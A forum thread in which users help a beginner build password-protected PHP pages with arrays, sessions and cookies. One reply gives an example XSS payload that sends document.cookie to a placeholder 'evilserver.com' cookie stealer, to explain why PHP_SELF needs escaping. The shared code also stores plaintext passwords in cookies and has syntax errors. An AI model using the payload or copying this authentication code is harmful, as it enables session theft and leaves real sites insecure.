If() Elseif()

[djr33]

It can be even simpler than that, but that should work. Here is what I'd write:

PHP Code:

$f = explode("\n",file_get_contents('myfile.php'));
unset($f[count($f)]); unset($f[0]); sort($f); //remove the PHP line at top of file
if (in_array($password)) {
//ok
include('loggedinpage.php'); //probably
}
else
{
header("location: login.php")
} 


For the password page, save as a .php file, and use this format:

PHP Code:

<?php die('You may not view this page.'); //or 'error' ?>
password1
password2
password3
etc...
?>

Also, here is another easy way: Store the passwords in an array in a php file.

PHP Code:

$passwords = array(
'pass1' => 'full';
'pass2' => 'some';
'pass3' => 'some';
'pass4' => 'limited'
); 


include() that page, and check if $passwords[$pass] is set. If so, it's value will tell you the permission level.
(You could just type this list in your page directly, if it is short enough to not make things messy.)

It's better if you understand this than if I write it for you, so you can make it fit exactly how you want.

Now that you see these functions, I hope it is easy to adjust.


Note: The reason for having the line at the top of die() on the included page is so that you can't just view the passwords. That will skip it. Then the parsing page knows to ignore the first (and last) line.


Good luck. If you don't understand part of it, ask. I didn't explain every line, but you should be able to guess what it does. Not much is unexpected.

[TimFA]

I don't do much with PHP, looks like I'm going to be research PHP Sessions. Ayways I understand the above script.

opening & getting the data:
$fp = fopen('flat-file-data.txt','r');
$line = fgets($fp, 1024);

organization:
list ($passwordlvl1, $passwordlvl2, $passwordlvl3) = split ('\|', $line);
note: i understand, durrrr the "|" symbol simply means this is where the end of this line is. at first i misunderstood.
checking:
if($_SESSION['password']==$passwordlvl1)
{
//password #1
}
elseif($_SESSION['password']==$passwordlvl2)
{
//password #2
}

elseif($_SESSION['password']==$passwordlvl3)
{
//password #3
}

if not correct:

else
{
header("location: login.php");
}

[Twey]

Code:

<?php session_start(); ?>
<?php
  $prefix = 'display_page_';
  $pws = array(
    'pass1' => 'one',
    'pass2' => 'two',
    'pass3' => 'three'
  );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<?php
  function no_pass() {
?>
  <head>
    <title>Please Enter a Password</title>
  </head>
  <body>
    <p>
      Please enter a password.
    </p>
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
      <div>
        <label>
          Password:
          <input type="password" name="password">
        </label>
      </div>
    </form>
  </body>
<?php
  } function wrong_pass() {
?>
  <head>
    <title>Wrong Password</title>
  </head>
  <body>
    <p>
      You got the password wrong, you silly bear!
    </p>
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
      <div>
        <label>
          Try again:
          <input type="password" name="password">
        </label>
      </div>
    </form>
  </body>
<?php
  } function display_page_one() {
?>
  <head>
    <title>Page One</title>
  </head>
  <body>
    <p>
      Welcome to Page One!
    </p>
  </body>
<?php
  } function display_page_two() {
?>
  <head>
    <title>Page Two</title>
  </head>
  <body>
    <p>
      This is Page Two!
    </p>
  </body>
<?php
  } function display_page_three() {
?>
  <head>
    <title>Page Three</title>
  </head>
  <body>
    <p>
      And this is page three!
    </p>
  </body>
<?php
  }

  $pw = $_SESSION['password'] = (isset($_POST['password'])
    ? @$_POST['password']
    : @$_SESSION['password']);

  if(!$pw)
    no_pass();
  else if(function_exists($fn = $prefix . @$pws[$pw]))
    $fn();
  else
    wrong_pass();
?>
</html>

Databases and page templates in separate files really are easier though. Untested.

[fileserverdirect]

If it's PHP Sessions your looking for:
http://www.tizag.com/phpT/phpsessions.php
It's a good beginners tutorial.
---
djr33's way works the same as mine except it is for "mass" password storing that is universal for your site(however you could use it for however many you want ). There is a small add-on to his script, that you need if you do not want to check to see if the password is set. This is if certan passwords needed certan permissons. Place this at the top of each protected page for eqach permission.

PHP Code:

include('passwords.php');
if($_SESSION['pass']==$passwords[pass1])
{
include('protectedpage.php');
}
else {
header('location: login.php');
} 


You will need to use the array in passwords.php:

PHP Code:

$passwords = array(
'pass1' => 'full';
'pass2' => 'some';
'pass3' => 'some';
'pass4' => 'limited'
); 


EDIT: Post was started before Twey's, did not know he posted

[TimFA]

Ok, I was trying to make my own version with the first thing.

login.php

Code:

<?php
if(($_POST['password'])=="password1") {
setcookie("password", $password1, time()+604800);
print("pass1");
}

elseif(($_POST['password'])=="password2") {
setcookie("password", $password2, time()+604800);
print("pass2");
}

elseif(($_POST['password'])=="password3") {
setcookie("password", $password3, time()+604800);
print("pass3");
}

else {
print("no pass");
}
?>

insert into the page requiring login:

Code:

<?php
$password = $HTTP_COOKIE_VARS["password"];

if ($password=="$password1") {
print ("logged in. pass: password1
<br>
<br>
<a href=\"phpscripts/logout.php\">Logout</a>");
}

elseif ($password=="$password2") {
print ("logged in. pass: password2
<br>
<br>
<a href=\"phpscripts/logout.php\">Logout</a>");
}

elseif ($password=="$password3") {
print ("logged in. pass: password3
<br>
<br>
<a href=\"phpscripts/logout.php\">Logout</a>");
}

else {
print ("Login please.
<br>
<br>
Password:
<br>
<form method=\"POST\" action=\"phpscripts/login.php\">
<input class=\"field\" type=\"text\" name=\"password\" size=\"7\">
<br>
<br>
<input onmouseover=\"this.src='images/buttons/loginbutton_mouseon.gif';\" onmouseout=\"this.src='images/buttons/loginbutton_mouseoff.gif';\" type=\"image\" src=\"images/buttons/loginbutton_mouseoff.gif\" alt=\"Login\">
</form>");
}
?>

logout.php

Code:

<?php
setcookie ("password", "", time()-604800);
print ("<head><script language=\"JavaScript\">
var time = null
function move() {
window.location = 'http://fassist.profusehost.net/'
}
</script>
</head>
<body  onload=\"timer=setTimeout('move()',1000)\">
</body>");
?>

Heres the problem, first time I refreshed it worked fine, asked me for a pass. I input password1, just fine page comes up "logged in. pass: password1", but I can't logout...I tried clearing cookies, running CCleaner, and of course to run CCleaner you must shutdown FireFox, so clearly its been restarted I tried Ctrl+F5. Then I made the logout.php nothing I do works, why can't I log back out?????

edit: i just viewed in Opera, it displayed the same message which tells me there might be something wrong with the script ? But the first time it seemed to work...

[tech_support]

Code:

...<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">...

Hm.. I read in a book once that you need to put htmlspecialchars() on $_SERVER['PHP_SELF']. Some security issue. Is that over-kill or something?

[Twey]

If someone broke into your server and moved the script to a location like "><script>location="http://www.evilserver.com/cookiestealer.php?cookies="+document.cookie;</script>.php then there's the potential for an XSS attack, but in that case you've bigger things to worry about Doesn't hurt though.

[TimFA]

I was trying to this time, not use someone else's scripting, so can someone point me in the direction of what I did wrong on mine?

edit: wait, is an escape needed? like here:

Code:

elseif ($password=="\$password2") {

[TimFA]

Found some of the problems. I'm about to test and see if it works.

edit: now it always detects me as not logged in, I suspect either my cookie placing is faulty, or the detection is.

insert for login:

Code:

<?php
$password = $HTTP_COOKIE_VARS["password"];

if ($password=="password1") {
print ("logged in. pass: password1
<br>
<br>
<a href=\"phpscripts/logout.php\">Logout</a>");
}

elseif ($password=="password2") {
print ("logged in. pass: password2
<br>
<br>
<a href=\"phpscripts/logout.php\">Logout</a>");
}

elseif ($password=="password3") {
print ("logged in. pass: password3
<br>
<br>
<a href=\"phpscripts/logout.php\">Logout</a>");
}

else {
print ("Login please.
<br>
<br>
Password:
<br>
<form method=\"POST\" action=\"phpscripts/login.php\">
<input class=\"field\" type=\"text\" name=\"password\" size=\"7\">
<br>
<br>
<input onmouseover=\"this.src='images/buttons/loginbutton_mouseon.gif';\" onmouseout=\"this.src='images/buttons/loginbutton_mouseoff.gif';\" type=\"image\" src=\"images/buttons/loginbutton_mouseoff.gif\" alt=\"Login\">
</form>");
}
?>

login.php

Code:

<?php
if(($_POST['password'])=="password1") {
setcookie("password", "password1", time()+604800);
print("pass1");
}

elseif(($_POST['password'])=="password2") {
setcookie("password", "password2", time()+604800);
print("pass2");
}

elseif(($_POST['password'])=="password3") {
setcookie("password", "password3", time()+604800);
print("pass3");
}

else {
print("no pass");
}
?>

logout.php

Code:

<?php
setcookie ("password", "", time()-604800);
print ("<head><script language=\"JavaScript\">
var time = null
function move() {
window.location = 'http://fassist.profusehost.net/testing'
}
</script>
</head>
<body  onload=\"timer=setTimeout('move()',1000)\">
</body>");
?>

Thanks again guys,
Tim

[djr33]

PHP sessions are much better than cookies.